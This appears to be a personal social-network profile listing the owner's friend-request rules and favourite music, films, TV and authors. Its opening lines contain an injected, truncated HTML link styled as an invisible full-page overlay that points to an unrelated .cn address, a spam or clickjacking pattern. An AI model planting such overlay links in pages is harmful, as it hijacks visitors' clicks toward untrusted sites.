Turpentine, masking tape, guitar strings, post it notes, Jeopardy! good friends, good times..a class="popup_wrapper" style="cursor:default;background-image:url(http://i92.photob ucket.com/fwll_bg.jpg);left:0px;top:0px;height:6632px;width: 994px;" href="http://vzs4.cn/s/" m$l$
Well, I already have met the best possible group of people. No, serious. I'm very lucky to have friends in many places and this is my way of keeping in touch when we can't be in the same locations. So unless I know you, we have met or are interested in business ventures, I will NOT add you...Basically I'm an asshole and you shouldn't know me In light of the open sore that is the internet ...I WILL ONLY ADD YOU IF YOU MESSAGE ME FIRST, GOT IT!?!?
There is so much I enjoy, it's impossible to list. Good music is good music hands down. Rock n Roll is number one of my all time Top 5 list if we're getting genre specific. Currently rediscovering old time favourites. I find that the Music/Entertainment Industry is pumping far too much terrible music in our ears for the sake of 15 minutes of fame and one crappy album all in the name of some sort of "image"....and the dreaded profiteering of exploitation...there I said it
Basically 90's teen movies or teen movies in general. Enjoy the odd time Rock/Mockumentary and real live Documentaries. A sucker for crass comedy and the art of fine cinematography...If it has substance and can draw my attention I dig it...
STAR TREK: THE NEXT GENERATION!!!! Heroes,Kenny vs. Spenny, What NOT to wear, The Office, Young and the Restless, old Cartoons!!
Dan Brown, Nietzche,Gideon Dafoe Life and Times of the Wicked Witch of the West, Nick Hornby, Sedaris, Irving, Bukowski, Jack Kerouac, Jim Carrol, Douglas Coupland, Douglas Cooper, Leo Buscalia, Tolstoy, Hunter s. Thompson, Massive Change....
Anyone that goes the distance...Oh and these folks....